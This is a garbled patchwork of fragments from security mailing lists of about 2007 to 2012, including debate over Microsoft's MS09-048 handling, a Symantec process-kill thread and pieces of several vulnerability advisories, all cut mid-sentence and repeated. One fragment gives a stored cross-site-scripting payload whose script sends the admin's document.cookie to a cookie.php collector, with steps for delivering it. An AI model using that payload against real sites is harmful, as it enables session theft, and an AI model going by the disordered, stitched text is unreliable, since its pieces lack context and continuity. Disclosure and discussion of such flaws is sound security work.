> -----Original Message-----
> From: Larry Seltzer [mailto:larry@larryseltzer.com]
> Sent: Wednesday, September 16, 2009 5:03 PM
> To: Susan Bradley; Thor (Hammer of God)
> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> Yes, they used the bulletin to soft-pedal the description, but at the
> same time I think they send a message about XP users being on shaky
> ground. Just because they've got 4+ years of Extended Support Period
> left doesn't mean they're going to get first-class treatment.
-----Original Message-----
From: Larry Seltzer [mailto:larry@larryseltzer.com]
Sent: Wednesday, September 16, 2009 5:03 PM
To: Susan Bradley; Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.
-----Original Message-----
From: full-disclosure-bounces@lists.grok.org.uk [mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of NSO Research
Sent: Tuesday, October 20, 2009 12:10 PM
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
_________________________________________
Security Advisory NSOADV-2009-003
_________________________________________
_________________________________________
>>> -----Original Message-----
>>> From: Larry Seltzer [mailto:larry@larryseltzer.com] Sent: Wednesday,
>>> September 16, 2009 5:03 PM
>>> To: Susan Bradley; Thor (Hammer of God)
>>> Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
>>> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>>>
>>> Yes, they used the bulletin to soft-pedal the description, but at the
>>> same time I think they send a message about XP users being on shaky
>>> ground. Just because they've got 4+ years of Extended Support Period
>>> left doesn't mean they're going to get first-class treatment.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
fetchmail-SA-2009-01: Improper SSL certificate subject verification
Topics: Improper SSL certificate subject verification
Author: Matthias Andree
Version: 1.0
Announced: 2009-08-06
[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Susan
Bradley
Sent: Wednesday, September 16, 2009 2:26 PM
To: Thor (Hammer of God)
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
It's only "default" for people running XP standalone/consumer that are
not even in a home network settings.
That kinda slices and dices that default down to a VERY narrow sub sub
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@live.in>
Sent: Friday, February 20, 2009 11:01 AM
To: <bugtraq@securityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
> Privilege Escalation attack
>
> POC:
>
This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of the Web Administrator frontend.
2. XSS in webfrontend through a Mail Subject:
---------------------------------------------
The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before shown in the Web Administrator
frontend.
> -----Original Message-----
> From: Jim Harrison [mailto:Jim@isatools.org]
> Sent: Sunday, July 20, 2008 4:33 PM
> To: 'me@abegetchell.com'; 'Thor (Hammer of God)'; 'Johan Beisser'
> Cc: bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
>
> It's about reality & priorities.
>
> What we're both saying is:
> 1. it's a bug and should be fixed in accordance with its impact on real
Thor (Hammer of God) wrote:
> Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
>
> 1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
>
> 2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
>
> t
>
>
>> -----Original Message-----
Yeah, I know what it is and what it's for ;) That was just my subtle way of trying to make a point. To be more explicit:
1) If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details. Say "THERE WILL BE NO PATCH, EVER. HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK." Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues. It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
2) Think things through. If you are going to try to boot sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it. Seems like simple logic points to me.
t
> -----Original Message-----
> From: Susan Bradley [mailto:sbradcpa@pacbell.net]
--------------------------------------------------
From: "David Calabro" <dcalabro@transitionalwork.org>
Sent: Saturday, February 14, 2009 1:02 AM
To: "'Sandeep Cheema'" <51l3n7@live.in>; <bugtraq@securityfocus.com>
Subject: RE: SEPKILL /im SMC.EXE /f
> If the Symantec Management Client service was somehow changed from
> "smc.exe" to "smc.exe -P" it would effectively prevent the service from
> starting in the first place. Correct?
>
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@live.in>
Sent: Thursday, February 19, 2009 12:50 PM
To: <bugtraq@securityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
> Please note the following. I have reported this to Symantec at
> https://forums.symantec.com/syment/board/message?board.id=endpoint_protection11&thread.id=25786&view=by_date_ascending&page=2
>
>
-----Original Message-----
From: Abe Getchell [mailto:me@abegetchell.com]
Sent: Sunday, July 20, 2008 12:32 PM
To: 'Thor (Hammer of God)'; Jim Harrison; 'Johan Beisser'
Cc: bugtraq@securityfocus.com
Subject: RE: Windows Vista Power Management & Local Security Policy
So, you guys don't think it's an issue that power management in Vista
(apparently) has a pass to bypass local security policy?
--
Date: Tue, 10 Jan 2012 14:22:08 -0500
From: Hugo Fortier <hfortier@recon.cx>
User-Agent: Unknown
MIME-Version: 1.0
To: "info@recon.cx" <info@recon.cx>
Subject: Yo
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Who forgot to shut down the VAX VM?
-------
1) Register in The Site
2) Go to send message http://path/?action=compose
3) We Put in
To:admin name
Subject: Some Subject
Message: <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
The js code Worked When The admin Read The Message
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2) HTML Injection
+++++++++++++++++
-----Original Message-----
From: Sandeep Cheema [mailto:51l3n7@live.in]
Sent: Friday, February 13, 2009 12:25 PM
To: bugtraq@securityfocus.com
Subject: Re: SEPKILL /im SMC.EXE /f
Just as an update couldn't get any further other than the fact that
SMCGui.exe is getting killed as its running in the user account and SMC.exe
in the system account.
> -----Original Message-----
> From: Larry Seltzer [mailto:larry@larryseltzer.com]
> Sent: Wednesday, September 16, 2009 8:21 AM
> To: Thor (Hammer of God); Eric C. Lukens; bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> I agree that the FAQ explanation in the advisory is vague about what
> protection the firewall provides. One clue I would infer about it is
> that they rated this a "Low" threat. If it were vulnerable in the
> default configuration, with the firewall (or some other firewall) on,
--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@live.in>
Sent: Wednesday, February 18, 2009 1:54 PM
To: "Sandeep Cheema" <51l3n7@live.in>; "Jon Kloske" <jon@uq.edu.au>
Cc: <bugtraq@securityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
> In fact looks like Symantec has inherited the bug from Sygate. The
> original one looks to be patched up though but on similar lines.
>
> http://seclists.org/bugtraq/2005/Dec/0249.html
> -----Original Message-----
> From: Thor (Hammer of God) [mailto:thor@hammerofgod.com]
> Sent: Saturday, July 19, 2008 6:20 PM
> To: me@abegetchell.com; Jim Harrison; bugtraq@securityfocus.com
> Subject: RE: Windows Vista Power Management & Local Security Policy
>
> If Jim is going to get Nancy to run a program, and that's "not all that
> hard," then why not just have that program do what you want in the
> first
> place rather than worrying about the power switch nonsense? This is
http://maildemo.smartertools.com/Login.aspx
Apparently this webmail is vulnerable to a very dangerous XSS attack, because it runs automatically when you open the inbox.
The vulnerability lies in creating a malformed mail: the procedure is to add a line of code to the subject, and this causes the XSS to execute in your inbox.
Simply add the following line of code to the subject of the mail to execute it:
As a precaution, the line of code is stored in the text file; just copy and paste it into the subject of the mail to test the concept.
Intro:
Word 2007 is the latest installment of Microsoft's word processing program
Bug:
Word 2007 with the "save as pdf" add-on is vulnerable to a path disclosure when using the feature's email as pdf option, accessible through the office button. This feature enables a user to email a word doc as a pdf without saving it as a pdf first. When doing so, the full path to the file is placed on the subject line of the email being drafted. When working with documents that are not resident on the user's drive or an accessible network share (such as an email attachment or web page) the path to the temporary file that is created is placed in the subject line. Like so:
From: Joey Jackrabbit
Sent: Friday, November 30, 2007 2:15 PM
To: Jacob Smith
Cc: John Smith
Issue First Created: 2007-11-08
Issue Last Modified: 2007-11-08
Issue Revision: 01
____________________________________________________________________________
Subject Name: perl
Subject Summary: Programming Language
Subject Home: http://www.perl.com/
Subject Versions: 5.* <= 5.8.8
Vulnerability Id: CVE-2007-5116
>> From: full-disclosure-bounces@lists.grok.org.uk [mailto:full-
>> disclosure-bounces@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
>> Sent: Wednesday, September 16, 2009 8:00 AM
>> To: Eric C. Lukens; bugtraq@securityfocus.com
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
>>
>> Thanks for the link. The problem here is that not enough information
>> is given, and what IS given is obviously watered down to the point of
>> being ineffective.
>>
> From: full-disclosure-bounces@lists.grok.org.uk [mailto:full-
> disclosure-bounces@lists.grok.org.uk] On Behalf Of Thor (Hammer of God)
> Sent: Wednesday, September 16, 2009 8:00 AM
> To: Eric C. Lukens; bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?
>
> Thanks for the link. The problem here is that not enough information
> is given, and what IS given is obviously watered down to the point of
> being ineffective.
>
Jeroen
-----Original Message-----
From: Andrew Barkley <barkley@usa.net>
To: Jeroen <nowhereman@moenen.org>
Subject: Re: Circumventing Critical Security in Windows XP
Date: Sat, 20 Feb 2010 04:20:46 -0000
Hi,
-----Original Message-----
From: Thor (Hammer of God) [mailto:thor@hammerofgod.com]
Sent: Friday, January 15, 2010 10:05 AM
To: Gadi Evron
Cc: bugtraq@securityfocus.com
Subject: RE: All China, All The Time
Inline:
> Subject: Re: All China, All The Time
------------------------------------------------------------------------
<iq type="set">
<query xmlns="webmail:iq:auth">
<forgot>invalid@example.com</forgot>
<captcha uid="5861146275903694001237908440543">Z2JK 3WWY</captcha>
<subject>Your password for %EMAIL%</subject>
<message>
Dear %FULLNAME%,
your login data for webmail are following:
Username: %USERNAME%
Issuer: C=US, O=Equifax Secure Inc., CN=Equifax Secure Global
eBusiness CA-1
Validity
Not Before: Jul 31 00:00:01 2004 GMT
Not After : Sep 2 00:00:01 2004 GMT
Subject: CN=MD5 Collisions Inc. (http://www.phreedom.org/md5)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:a6:59:c9:2c:28:d6:2a:b0:f8:ed:9f:46:a4: